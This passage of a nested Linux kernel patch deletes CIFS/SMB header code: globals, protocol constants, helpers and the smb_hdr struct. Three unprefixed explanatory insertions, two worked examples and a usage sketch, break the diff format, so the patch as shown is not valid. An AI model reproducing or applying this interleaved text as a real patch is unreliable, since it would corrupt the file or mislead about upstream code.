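spin_unlock(&cifs_tcp_ses_lock);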
+-
+-#ifdef DECLARE_GLOBALS_HERE
+-#define GLOBAL_EXTERN
+-#else
+-#define GLOBAL_EXTERN extern
+-#endif
+-
+-/*
+- * the list of TCP_Server_Info structures, i.e. each of the sockets
+- * connecting our client to a distinct server (ip address), is
+- * chained together by cifs_tcp_ses_list. The list of all our SMB
+- * sessions (and from that the tree connections) can be found
+- * by iterating over cifs_tcp_ses_list.
+- */
+-extern struct list_head		cifs_tcp_ses_list;
+-
+-/*
+- * This lock protects the cifs_tcp_ses_list, the list of smb sessions per
+- * tcp session, and the list of tcon's per smb session. It also protects
+- * the reference counters for the server, smb session, and tcon.
+- * Generally the locks should be taken in the order tcp_ses_lock, then
+- * tcon->open_file_lock, then file->file_info_lock, since the
+- * structure order is cifs_socket-->cifs_ses-->cifs_tcon-->cifs_file.
+- */
+-extern spinlock_t		cifs_tcp_ses_lock;
+-
+-/*
+- * Global transaction id (XID) information
+- */
+-extern unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
+-extern unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
+-extern unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
+-extern spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
+-
+-/*
+- *  Global counters, updated atomically
+- */
+-extern atomic_t sesInfoAllocCount;
+-extern atomic_t tconInfoAllocCount;
+-extern atomic_t tcpSesNextId;
+-extern atomic_t tcpSesAllocCount;
+-extern atomic_t tcpSesReconnectCount;
+-extern atomic_t tconInfoReconnectCount;
+-
+-/* Various Debug counters */
+-extern atomic_t buf_alloc_count;	/* current number allocated  */
+-extern atomic_t small_buf_alloc_count;
+-#ifdef CONFIG_CIFS_STATS2
+-extern atomic_t total_buf_alloc_count; /* total allocated over all time */
+-extern atomic_t total_small_buf_alloc_count;
+-extern unsigned int slow_rsp_threshold; /* number of secs before logging */
+-#endif
+-
+-/* Misc globals */
+-extern bool enable_oplocks; /* enable or disable oplocks */
+-extern bool lookupCacheEnabled;
+-extern unsigned int global_secflags;	/* if on, session setup sent
+-				with more secure ntlmssp2 challenge/resp */
+-extern unsigned int sign_CIFS_PDUs;  /* enable smb packet signing */
+-extern bool enable_gcm_256; /* allow optional negotiate of strongest signing (aes-gcm-256) */
+-extern bool require_gcm_256; /* require use of strongest signing (aes-gcm-256) */
+-extern bool enable_negotiate_signing; /* request use of faster (GMAC) signing if available */
+-extern bool linuxExtEnabled; /* enable Linux/Unix CIFS extensions */
+-extern unsigned int CIFSMaxBufSize;  /* max size not including hdr */
+-extern unsigned int cifs_min_rcv;    /* min size of big ntwrk buf pool */
+-extern unsigned int cifs_min_small;  /* min size of small buf pool */
+-extern unsigned int cifs_max_pending; /* MAX requests at once to server*/
+-extern bool disable_legacy_dialects;  /* forbid vers=1.0 and vers=2.0 mounts */
+-extern atomic_t mid_count;
+-
+-void cifs_oplock_break(struct work_struct *work);
+-void cifs_queue_oplock_break(struct cifsFileInfo *cfile);
+-void smb2_deferred_work_close(struct work_struct *work);
+-
+-extern const struct slow_work_ops cifs_oplock_break_ops;
+-extern struct workqueue_struct *cifsiod_wq;
+-extern struct workqueue_struct *decrypt_wq;
+-extern struct workqueue_struct *fileinfo_put_wq;
+-extern struct workqueue_struct *cifsoplockd_wq;
+-extern struct workqueue_struct *deferredclose_wq;
+-extern __u32 cifs_lock_secret;
+-
+-extern mempool_t *cifs_mid_poolp;
+-
+-/* Operations for different SMB versions */
+-#define SMB1_VERSION_STRING	"1.0"
+-#define SMB20_VERSION_STRING    "2.0"
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-extern struct smb_version_operations smb1_operations;
+-extern struct smb_version_values smb1_values;
+-extern struct smb_version_operations smb20_operations;
+-extern struct smb_version_values smb20_values;
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-#define SMB21_VERSION_STRING	"2.1"
+-extern struct smb_version_operations smb21_operations;
+-extern struct smb_version_values smb21_values;
+-#define SMBDEFAULT_VERSION_STRING "default"
+-extern struct smb_version_values smbdefault_values;
+-#define SMB3ANY_VERSION_STRING "3"
+-extern struct smb_version_values smb3any_values;
+-#define SMB30_VERSION_STRING	"3.0"
+-extern struct smb_version_operations smb30_operations;
+-extern struct smb_version_values smb30_values;
+-#define SMB302_VERSION_STRING	"3.02"
+-#define ALT_SMB302_VERSION_STRING "3.0.2"
+-/*extern struct smb_version_operations smb302_operations;*/ /* not needed yet */
+-extern struct smb_version_values smb302_values;
+-#define SMB311_VERSION_STRING	"3.1.1"
+-#define ALT_SMB311_VERSION_STRING "3.11"
+-extern struct smb_version_operations smb311_operations;
+-extern struct smb_version_values smb311_values;
+-
+-static inline char *get_security_type_str(enum securityEnum sectype)
+-{
+-	switch (sectype) {
+-	case RawNTLMSSP:
+-		return "RawNTLMSSP";
+-	case Kerberos:
+-		return "Kerberos";
+-	case NTLMv2:
+-		return "NTLMv2";
+-	default:
+-		return "Unknown";
+-	}
+-}
+-
+-static inline bool is_smb1_server(struct TCP_Server_Info *server)
+-{
+-	return strcmp(server->vals->version_string, SMB1_VERSION_STRING) == 0;
+-}
+-
+-static inline bool is_tcon_dfs(struct cifs_tcon *tcon)
+-{
+-	/*
+-	 * For SMB1, see MS-CIFS 2.4.55 SMB_COM_TREE_CONNECT_ANDX (0x75) and MS-CIFS 3.3.4.4 DFS
+-	 * Subsystem Notifies That a Share Is a DFS Share.
+-	 *
+-	 * For SMB2+, see MS-SMB2 2.2.10 SMB2 TREE_CONNECT Response and MS-SMB2 3.3.4.14 Server
+-	 * Application Updates a Share.
+-	 */
+-	if (!tcon || !tcon->ses || !tcon->ses->server)
+-		return false;
+-	return is_smb1_server(tcon->ses->server) ? tcon->Flags & SMB_SHARE_IS_IN_DFS :
+-		tcon->share_flags & (SHI1005_FLAGS_DFS | SHI1005_FLAGS_DFS_ROOT);
+-}
+-
+-static inline bool cifs_is_referral_server(struct cifs_tcon *tcon,
+-					   const struct dfs_info3_param *ref)
+-{
+-	/*
+-	 * Check if all targets are capable of handling DFS referrals as per
+-	 * MS-DFSC 2.2.4 RESP_GET_DFS_REFERRAL.
+-	 */
+-	return is_tcon_dfs(tcon) || (ref && (ref->flags & DFSREF_REFERRAL_SERVER));
+-}
+-
+-static inline u64 cifs_flock_len(const struct file_lock *fl)
+-{
+-	return (u64)fl->fl_end - fl->fl_start + 1;
+-}
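For example, a byte-range lock covering bytes 0 through 9 has fl_start = 0 and fl_end = 9, so the length reported to the server is 9 - 0 + 1 = 10.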
+-
+-static inline size_t ntlmssp_workstation_name_size(const struct cifs_ses *ses)
+-{
+-	if (WARN_ON_ONCE(!ses || !ses->server))
+-		return 0;
+-	/*
+-	 * Make workstation name no more than 15 chars when using insecure dialects as some legacy
+-	 * servers do require it during NTLMSSP.
+-	 */
+-	if (ses->server->dialect <= SMB20_PROT_ID)
+-		return min_t(size_t, sizeof(ses->workstation_name), RFC1001_NAME_LEN_WITH_NULL);
+-	return sizeof(ses->workstation_name);
+-}
+-
+-static inline void move_cifs_info_to_smb2(struct smb2_file_all_info *dst, const FILE_ALL_INFO *src)
+-{
+-	memcpy(dst, src, (size_t)((u8 *)&src->AccessFlags - (u8 *)src));
+-	dst->AccessFlags = src->AccessFlags;
+-	dst->CurrentByteOffset = src->CurrentByteOffset;
+-	dst->Mode = src->Mode;
+-	dst->AlignmentRequirement = src->AlignmentRequirement;
+-	dst->FileNameLength = src->FileNameLength;
+-}
+-
+-static inline unsigned int cifs_get_num_sgs(const struct smb_rqst *rqst,
+-					    int num_rqst,
+-					    const u8 *sig)
+-{
+-	unsigned int len, skip;
+-	unsigned int nents = 0;
+-	unsigned long addr;
+-	int i, j;
+-
+-	/* Assumes the first rqst has a transform header as the first iov.
+-	 * I.e.
+-	 * rqst[0].rq_iov[0]  is transform header
+-	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
+-	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
+-	 */
+-	for (i = 0; i < num_rqst; i++) {
+-		/*
+-		 * The first rqst has a transform header where the
+-		 * first 20 bytes are not part of the encrypted blob.
+-		 */
+-		for (j = 0; j < rqst[i].rq_nvec; j++) {
+-			struct kvec *iov = &rqst[i].rq_iov[j];
+-
+-			skip = (i == 0) && (j == 0) ? 20 : 0;
+-			addr = (unsigned long)iov->iov_base + skip;
+-			if (unlikely(is_vmalloc_addr((void *)addr))) {
+-				len = iov->iov_len - skip;
+-				nents += DIV_ROUND_UP(offset_in_page(addr) + len,
+-						      PAGE_SIZE);
+-			} else {
+-				nents++;
+-			}
+-		}
+-		nents += rqst[i].rq_npages;
+-	}
+-	nents += DIV_ROUND_UP(offset_in_page(sig) + SMB2_SIGNATURE_SIZE, PAGE_SIZE);
+-	return nents;
+-}
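A worked instance of the vmalloc branch above: a 5000-byte kvec in rqst[0].rq_iov[0] whose post-skip address falls 120 bytes into a vmalloc'd page (all numbers illustrative):

/*
 *   skip  = 20 (first iov of the first rqst is the transform header)
 *   len   = 5000 - 20                       = 4980
 *   nents = DIV_ROUND_UP(120 + 4980, 4096)  = 2 scatterlist entries
 */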
+-
+-/* We can not use the normal sg_set_buf() as we will sometimes pass a
+- * stack object as buf.
+- */
+-static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
+-						  const void *buf,
+-						  unsigned int buflen)
+-{
+-	unsigned long addr = (unsigned long)buf;
+-	unsigned int off = offset_in_page(addr);
+-
+-	addr &= PAGE_MASK;
+-	if (unlikely(is_vmalloc_addr((void *)addr))) {
+-		do {
+-			unsigned int len = min_t(unsigned int, buflen, PAGE_SIZE - off);
+-
+-			sg_set_page(sg++, vmalloc_to_page((void *)addr), len, off);
+-
+-			off = 0;
+-			addr += PAGE_SIZE;
+-			buflen -= len;
+-		} while (buflen);
+-	} else {
+-		sg_set_page(sg++, virt_to_page(addr), buflen, off);
+-	}
+-	return sg;
+-}
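Sketch of filling a table that mixes a stack signature buffer with a possibly-vmalloc'd payload using the helper above (sgl, sig, payload, and payload_len are invented; a real caller would size the table via cifs_get_num_sgs()):

struct scatterlist sgl[8], *sg = sgl;

sg_init_table(sgl, ARRAY_SIZE(sgl));
sg = cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);	/* stack object */
sg = cifs_sg_set_buf(sg, payload, payload_len);		/* may span pages */
sg_mark_end(sg - 1);					/* terminate the list */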
+-
+-#endif	/* _CIFS_GLOB_H */
+diff --git a/fs/cifs/cifspdu.h b/fs/cifs/cifspdu.h
+deleted file mode 100644
+index d1abaeea974a9..0000000000000
+--- a/fs/cifs/cifspdu.h
++++ /dev/null
+@@ -1,2730 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFSPDU_H
+-#define _CIFSPDU_H
+-
+-#include <net/sock.h>
+-#include <asm/unaligned.h>
+-#include "../smbfs_common/smbfsctl.h"
+-
+-#define CIFS_PROT   0
+-#define POSIX_PROT  (CIFS_PROT+1)
+-#define BAD_PROT 0xFFFF
+-
+-/* SMB command codes:
+- * Note some commands have minimal (wct=0,bcc=0), or uninteresting, responses
+- * (ie which include no useful data other than the SMB error code itself).
+- * This can allow us to avoid response buffer allocations and copy in some cases
+- */
+-#define SMB_COM_CREATE_DIRECTORY      0x00 /* trivial response */
+-#define SMB_COM_DELETE_DIRECTORY      0x01 /* trivial response */
+-#define SMB_COM_CLOSE                 0x04 /* triv req/rsp, timestamp ignored */
+-#define SMB_COM_FLUSH                 0x05 /* triv req/rsp */
+-#define SMB_COM_DELETE                0x06 /* trivial response */
+-#define SMB_COM_RENAME                0x07 /* trivial response */
+-#define SMB_COM_QUERY_INFORMATION     0x08 /* aka getattr */
+-#define SMB_COM_SETATTR               0x09 /* trivial response */
+-#define SMB_COM_LOCKING_ANDX          0x24 /* trivial response */
+-#define SMB_COM_COPY                  0x29 /* trivial rsp, fail filename ignrd*/
+-#define SMB_COM_ECHO                  0x2B /* echo request */
+-#define SMB_COM_OPEN_ANDX             0x2D /* Legacy open for old servers */
+-#define SMB_COM_READ_ANDX             0x2E
+-#define SMB_COM_WRITE_ANDX            0x2F
+-#define SMB_COM_TRANSACTION2          0x32
+-#define SMB_COM_TRANSACTION2_SECONDARY 0x33
+-#define SMB_COM_FIND_CLOSE2           0x34 /* trivial response */
+-#define SMB_COM_TREE_DISCONNECT       0x71 /* trivial response */
+-#define SMB_COM_NEGOTIATE             0x72
+-#define SMB_COM_SESSION_SETUP_ANDX    0x73
+-#define SMB_COM_LOGOFF_ANDX           0x74 /* trivial response */
+-#define SMB_COM_TREE_CONNECT_ANDX     0x75
+-#define SMB_COM_NT_TRANSACT           0xA0
+-#define SMB_COM_NT_TRANSACT_SECONDARY 0xA1
+-#define SMB_COM_NT_CREATE_ANDX        0xA2
+-#define SMB_COM_NT_CANCEL             0xA4 /* no response */
+-#define SMB_COM_NT_RENAME             0xA5 /* trivial response */
+-
+-/* Transact2 subcommand codes */
+-#define TRANS2_OPEN                   0x00
+-#define TRANS2_FIND_FIRST             0x01
+-#define TRANS2_FIND_NEXT              0x02
+-#define TRANS2_QUERY_FS_INFORMATION   0x03
+-#define TRANS2_SET_FS_INFORMATION     0x04
+-#define TRANS2_QUERY_PATH_INFORMATION 0x05
+-#define TRANS2_SET_PATH_INFORMATION   0x06
+-#define TRANS2_QUERY_FILE_INFORMATION 0x07
+-#define TRANS2_SET_FILE_INFORMATION   0x08
+-#define TRANS2_GET_DFS_REFERRAL       0x10
+-#define TRANS2_REPORT_DFS_INCOSISTENCY 0x11
+-
+-/* SMB Transact (Named Pipe) subcommand codes */
+-#define TRANS_SET_NMPIPE_STATE      0x0001
+-#define TRANS_RAW_READ_NMPIPE       0x0011
+-#define TRANS_QUERY_NMPIPE_STATE    0x0021
+-#define TRANS_QUERY_NMPIPE_INFO     0x0022
+-#define TRANS_PEEK_NMPIPE           0x0023
+-#define TRANS_TRANSACT_NMPIPE       0x0026
+-#define TRANS_RAW_WRITE_NMPIPE      0x0031
+-#define TRANS_READ_NMPIPE           0x0036
+-#define TRANS_WRITE_NMPIPE          0x0037
+-#define TRANS_WAIT_NMPIPE           0x0053
+-#define TRANS_CALL_NMPIPE           0x0054
+-
+-/* NT Transact subcommand codes */
+-#define NT_TRANSACT_CREATE            0x01
+-#define NT_TRANSACT_IOCTL             0x02
+-#define NT_TRANSACT_SET_SECURITY_DESC 0x03
+-#define NT_TRANSACT_NOTIFY_CHANGE     0x04
+-#define NT_TRANSACT_RENAME            0x05
+-#define NT_TRANSACT_QUERY_SECURITY_DESC 0x06
+-#define NT_TRANSACT_GET_USER_QUOTA    0x07
+-#define NT_TRANSACT_SET_USER_QUOTA    0x08
+-
+-#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
+-/* future chained NTCreateXReadX bigger, but for time being NTCreateX biggest */
+-/* among the requests (NTCreateX response is bigger with wct of 34) */
+-#define MAX_CIFS_HDR_SIZE 0x58 /* 4 len + 32 hdr + (2*24 wct) + 2 bct + 2 pad */
+-#define CIFS_SMALL_PATH 120 /* allows for (448-88)/3 */
+-
+-/* internal cifs vfs structures */
+-/*****************************************************************
+- * All constants go here
+- *****************************************************************
+- */
+-
+-/*
+- * Starting value for maximum SMB size negotiation
+- */
+-#define CIFS_MAX_MSGSIZE (4*4096)
+-
+-/*
+- * Size of encrypted user password in bytes
+- */
+-#define CIFS_ENCPWD_SIZE (16)
+-
+-/*
+- * Size of the crypto key returned on the negotiate SMB in bytes
+- */
+-#define CIFS_CRYPTO_KEY_SIZE (8)
+-
+-/*
+- * Size of the ntlm client response
+- */
+-#define CIFS_AUTH_RESP_SIZE (24)
+-
+-/*
+- * Size of the session key (crypto key encrypted with the password
+- */
+-#define CIFS_SESS_KEY_SIZE (16)
+-
+-#define CIFS_SERVER_CHALLENGE_SIZE (8)
+-#define CIFS_HMAC_MD5_HASH_SIZE (16)
+-#define CIFS_CPHTXT_SIZE (16)
+-#define CIFS_NTHASH_SIZE (16)
+-
+-/*
+- * Maximum user name length
+- */
+-#define CIFS_UNLEN (20)
+-
+-/*
+- * Flags on SMB open
+- */
+-#define SMBOPEN_WRITE_THROUGH 0x4000
+-#define SMBOPEN_DENY_ALL      0x0010
+-#define SMBOPEN_DENY_WRITE    0x0020
+-#define SMBOPEN_DENY_READ     0x0030
+-#define SMBOPEN_DENY_NONE     0x0040
+-#define SMBOPEN_READ          0x0000
+-#define SMBOPEN_WRITE         0x0001
+-#define SMBOPEN_READWRITE     0x0002
+-#define SMBOPEN_EXECUTE       0x0003
+-
+-#define SMBOPEN_OCREATE       0x0010
+-#define SMBOPEN_OTRUNC        0x0002
+-#define SMBOPEN_OAPPEND       0x0001
+-
+-/*
+- * SMB flag definitions
+- */
+-#define SMBFLG_EXTD_LOCK 0x01	/* server supports lock-read write-unlock smb */
+-#define SMBFLG_RCV_POSTED 0x02	/* obsolete */
+-#define SMBFLG_RSVD 0x04
+-#define SMBFLG_CASELESS 0x08	/* all pathnames treated as caseless (off
+-				implies case sensitive file handling request) */
+-#define SMBFLG_CANONICAL_PATH_FORMAT 0x10	/* obsolete */
+-#define SMBFLG_OLD_OPLOCK 0x20	/* obsolete */
+-#define SMBFLG_OLD_OPLOCK_NOTIFY 0x40	/* obsolete */
+-#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
+-
+-/*
+- * SMB flag2 definitions
+- */
+-#define SMBFLG2_KNOWS_LONG_NAMES cpu_to_le16(1)	/* can send long (non-8.3)
+-						   path names in response */
+-#define SMBFLG2_KNOWS_EAS cpu_to_le16(2)
+-#define SMBFLG2_SECURITY_SIGNATURE cpu_to_le16(4)
+-#define SMBFLG2_COMPRESSED (8)
+-#define SMBFLG2_SECURITY_SIGNATURE_REQUIRED (0x10)
+-#define SMBFLG2_IS_LONG_NAME cpu_to_le16(0x40)
+-#define SMBFLG2_REPARSE_PATH (0x400)
+-#define SMBFLG2_EXT_SEC cpu_to_le16(0x800)
+-#define SMBFLG2_DFS cpu_to_le16(0x1000)
+-#define SMBFLG2_PAGING_IO cpu_to_le16(0x2000)
+-#define SMBFLG2_ERR_STATUS cpu_to_le16(0x4000)
+-#define SMBFLG2_UNICODE cpu_to_le16(0x8000)
+-
+-/*
+- * These are the file access permission bits defined in CIFS for the
+- * NTCreateAndX as well as the level 0x107
+- * TRANS2_QUERY_PATH_INFORMATION API.  The level 0x107, SMB_QUERY_FILE_ALL_INFO
+- * responds with the AccessFlags.
+- * The AccessFlags specifies the access permissions a caller has to the
+- * file and can have any suitable combination of the following values:
+- */
+-
+-#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
+-#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
+-#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
+-#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
+-					  /* with the file can be read        */
+-#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
+-					  /* with the file can be written     */
+-#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
+-					  /* the file using system paging I/O */
+-#define FILE_DELETE_CHILD     0x00000040
+-#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
+-					  /* file can be read                 */
+-#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
+-					  /* file can be written              */
+-#define DELETE                0x00010000  /* The file can be deleted          */
+-#define READ_CONTROL          0x00020000  /* The access control list and      */
+-					  /* ownership associated with the    */
+-					  /* file can be read                 */
+-#define WRITE_DAC             0x00040000  /* The access control list and      */
+-					  /* ownership associated with the    */
+-					  /* file can be written.             */
+-#define WRITE_OWNER           0x00080000  /* Ownership information associated */
+-					  /* with the file can be written     */
+-#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
+-					  /* synchronize with the completion  */
+-					  /* of an input/output request       */
+-#define SYSTEM_SECURITY       0x01000000  /* The system access control list   */
+-					  /* can be read and changed          */
+-#define GENERIC_ALL           0x10000000
+-#define GENERIC_EXECUTE       0x20000000
+-#define GENERIC_WRITE         0x40000000
+-#define GENERIC_READ          0x80000000
+-					 /* In summary - Relevant file       */
+-					 /* access flags from CIFS are       */
+-					 /* file_read_data, file_write_data  */
+-					 /* file_execute, file_read_attributes*/
+-					 /* write_dac, and delete.           */
+-
+-#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_READ_ATTRIBUTES)
+-#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-				| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
+-#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
+-
+-#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_WRITE_EA \
+-				| FILE_READ_ATTRIBUTES \
+-				| FILE_WRITE_ATTRIBUTES \
+-				| DELETE | READ_CONTROL | WRITE_DAC \
+-				| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-				| FILE_READ_EA | FILE_WRITE_EA \
+-				| FILE_READ_ATTRIBUTES \
+-				| FILE_WRITE_ATTRIBUTES \
+-				| DELETE | READ_CONTROL | WRITE_DAC \
+-				| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
+-				| FILE_READ_ATTRIBUTES \
+-				| FILE_WRITE_ATTRIBUTES \
+-				| DELETE | READ_CONTROL | WRITE_DAC \
+-				| WRITE_OWNER | SYNCHRONIZE)
+-
+-#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
+-				| READ_CONTROL | SYNCHRONIZE)
+-
+-
+-/*
+- * Invalid readdir handle
+- */
+-#define CIFS_NO_HANDLE        0xFFFF
+-
+-#define NO_CHANGE_64          0xFFFFFFFFFFFFFFFFULL
+-
+-/* IPC$ in ASCII */
+-#define CIFS_IPC_RESOURCE "\x49\x50\x43\x24"
+-
+-/* IPC$ in Unicode */
+-#define CIFS_IPC_UNICODE_RESOURCE "\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00"
+-
+-/* Unicode Null terminate 2 bytes of 0 */
+-#define UNICODE_NULL "\x00\x00"
+-#define ASCII_NULL 0x00
+-
+-/*
+- * Server type values (returned on EnumServer API
+- */
+-#define CIFS_SV_TYPE_DC     0x00000008
+-#define CIFS_SV_TYPE_BACKDC 0x00000010
+-
+-/*
+- * Alias type flags (From EnumAlias API call
+- */
+-#define CIFS_ALIAS_TYPE_FILE 0x0001
+-#define CIFS_SHARE_TYPE_FILE 0x0000
+-
+-/*
+- * File Attribute flags
+- */
+-#define ATTR_READONLY  0x0001
+-#define ATTR_HIDDEN    0x0002
+-#define ATTR_SYSTEM    0x0004
+-#define ATTR_VOLUME    0x0008
+-#define ATTR_DIRECTORY 0x0010
+-#define ATTR_ARCHIVE   0x0020
+-#define ATTR_DEVICE    0x0040
+-#define ATTR_NORMAL    0x0080
+-#define ATTR_TEMPORARY 0x0100
+-#define ATTR_SPARSE    0x0200
+-#define ATTR_REPARSE   0x0400
+-#define ATTR_COMPRESSED 0x0800
+-#define ATTR_OFFLINE    0x1000	/* ie file not immediately available -
+-					on offline storage */
+-#define ATTR_NOT_CONTENT_INDEXED 0x2000
+-#define ATTR_ENCRYPTED  0x4000
+-#define ATTR_POSIX_SEMANTICS 0x01000000
+-#define ATTR_BACKUP_SEMANTICS 0x02000000
+-#define ATTR_DELETE_ON_CLOSE 0x04000000
+-#define ATTR_SEQUENTIAL_SCAN 0x08000000
+-#define ATTR_RANDOM_ACCESS   0x10000000
+-#define ATTR_NO_BUFFERING    0x20000000
+-#define ATTR_WRITE_THROUGH   0x80000000
+-
+-/* ShareAccess flags */
+-#define FILE_NO_SHARE     0x00000000
+-#define FILE_SHARE_READ   0x00000001
+-#define FILE_SHARE_WRITE  0x00000002
+-#define FILE_SHARE_DELETE 0x00000004
+-#define FILE_SHARE_ALL    0x00000007
+-
+-/* CreateDisposition flags, similar to CreateAction as well */
+-#define FILE_SUPERSEDE    0x00000000
+-#define FILE_OPEN         0x00000001
+-#define FILE_CREATE       0x00000002
+-#define FILE_OPEN_IF      0x00000003
+-#define FILE_OVERWRITE    0x00000004
+-#define FILE_OVERWRITE_IF 0x00000005
+-
+-/* CreateOptions */
+-#define CREATE_NOT_FILE		0x00000001	/* if set must not be file */
+-#define CREATE_WRITE_THROUGH	0x00000002
+-#define CREATE_SEQUENTIAL       0x00000004
+-#define CREATE_NO_BUFFER        0x00000008      /* should not buffer on srv */
+-#define CREATE_SYNC_ALERT       0x00000010	/* MBZ */
+-#define CREATE_ASYNC_ALERT      0x00000020	/* MBZ */
+-#define CREATE_NOT_DIR		0x00000040    /* if set must not be directory */
+-#define CREATE_TREE_CONNECTION  0x00000080	/* should be zero */
+-#define CREATE_COMPLETE_IF_OPLK 0x00000100	/* should be zero */
+-#define CREATE_NO_EA_KNOWLEDGE  0x00000200
+-#define CREATE_EIGHT_DOT_THREE  0x00000400	/* doc says this is obsolete
+-						 "open for recovery" flag should
+-						 be zero in any case */
+-#define CREATE_OPEN_FOR_RECOVERY 0x00000400
+-#define CREATE_RANDOM_ACCESS	0x00000800
+-#define CREATE_DELETE_ON_CLOSE	0x00001000
+-#define CREATE_OPEN_BY_ID       0x00002000
+-#define CREATE_OPEN_BACKUP_INTENT 0x00004000
+-#define CREATE_NO_COMPRESSION   0x00008000
+-#define CREATE_RESERVE_OPFILTER 0x00100000	/* should be zero */
+-#define OPEN_REPARSE_POINT	0x00200000
+-#define OPEN_NO_RECALL          0x00400000
+-#define OPEN_FREE_SPACE_QUERY   0x00800000	/* should be zero */
+-#define CREATE_OPTIONS_MASK     0x007FFFFF
+-#define CREATE_OPTION_READONLY	0x10000000
+-#define CREATE_OPTION_SPECIAL   0x20000000   /* system. NB not sent over wire */
+-
+-/* ImpersonationLevel flags */
+-#define SECURITY_ANONYMOUS      0
+-#define SECURITY_IDENTIFICATION 1
+-#define SECURITY_IMPERSONATION  2
+-#define SECURITY_DELEGATION     3
+-
+-/* SecurityFlags */
+-#define SECURITY_CONTEXT_TRACKING 0x01
+-#define SECURITY_EFFECTIVE_ONLY   0x02
+-
+-/*
+- * Default PID value, used in all SMBs where the PID is not important
+- */
+-#define CIFS_DFT_PID  0x1234
+-
+-/*
+- * We use the same routine for Copy and Move SMBs.  This flag is used to
+- * distinguish
+- */
+-#define CIFS_COPY_OP 1
+-#define CIFS_RENAME_OP 2
+-
+-#define GETU16(var)  (*((__u16 *)var))	/* BB check for endian issues */
+-#define GETU32(var)  (*((__u32 *)var))	/* BB check for endian issues */
+-
+-struct smb_hdr {
+-	__be32 smb_buf_length;	/* BB length is only two (rarely three) bytes,
+-		with one or two byte "type" preceding it that will be
+-		zero - we could mask the type byte off */
+-	__u8 Protocol[4];
+-	__u8 Command;
+-	union {
+-		struct {
+-			__u8 ErrorClass;
+-			__u8 Reserved;
+-			__le16 Error;
+-		} __attribute__((packed)) DosError;
+-		__le32 CifsError;
+-	} __attribute__((packed)) Status;
+-	__u8 Flags;
+-	__le16 Flags2;		/* note: le */
+-	__le16 PidHigh;
+-	union {
+-		struct {
+-			__le32 SequenceNumber;  /* le */
+-			__u32 Reserved; /* zero */
+-		} __attribute__((packed)) Sequence;
+-		__u8 SecuritySignature[8];	/* le */
+-	} __attribute__((packed)) Signature;
+-	__u8 pad[2];
+-	__u16 Tid;
+-	__le16 Pid;
+-	__u16 Uid;
+-	__le16 Mid;
+-	__u8 WordCount;
+-} __attribute__((packed));
+-
+-/* given a pointer to an smb_hdr, retrieve a void pointer to the ByteCount */
+-static inline void *
+-BCC(struct smb_hdr *smb)
+-{
+-	return (void *)smb + sizeof(*smb) + 2 * smb->WordCount;
+-}
+-
+-/* given a pointer to an smb_hdr retrieve the pointer to the byte area */
+-#define pByteArea(smb_var) (BCC(smb_var) + 2)
+-
+-/* get the unconverted ByteCount for a SMB packet and return it */
+-static inline __u16
+-get_bcc(struct smb_hdr *hdr)
+-{
+-	__le16 *bc_ptr = (__le16 *)BCC(hdr);
+-
+-	return get_unaligned_le16(bc_ptr);
+-}
+-
+-/* set the ByteCount for a SMB packet in little-endian */
+-static inline void
+-put_bcc(__u16 count, struct smb_hdr *hdr)
+-{
+-	__le16 *bc_ptr = (__le16 *)BCC(hdr);
+-
+-	put_unaligned_le16(count, bc_ptr);
+-}
+-
+-/*
+- * Computer Name Length (since Netbios name was length 16 with last byte 0x20)
+- * No longer as important, now that TCP names are more commonly used to
+- * resolve hosts.
+- */
+-#define CNLEN 15
+-
+-/*
+- * Share Name Length (SNLEN)
+- * Note:  This length was limited by the SMB used to get
+- *        the Share info.   NetShareEnum only returned 13
+- *        chars, including the null termination.
+- * This was removed because it no longer is limiting.
+- */
+-
+-/*
+- * Comment Length
+- */
+-#define MAXCOMMENTLEN 40
+-
+-/*
+- * The OS/2 maximum path name
+- */
+-#define MAX_PATHCONF 256
+-
+-/*
+- *  SMB frame definitions  (following must be packed structs)
+- *  See the SNIA CIFS Specification for details.
+- *
+- *  The Naming convention is the lower case version of the
+- *  smb command code name for the struct and this is typedef to the
+- *  uppercase version of the same name with the prefix SMB_ removed
+- *  for brevity.  Although typedefs are not commonly used for
+- *  structure definitions in the Linux kernel, their use in the
+- *  CIFS standards document, which this code is based on, may
+- *  make this one of the cases where typedefs for structures make
+- *  sense to improve readability for readers of the standards doc.
+- *  Typedefs can always be removed later if they are too distracting
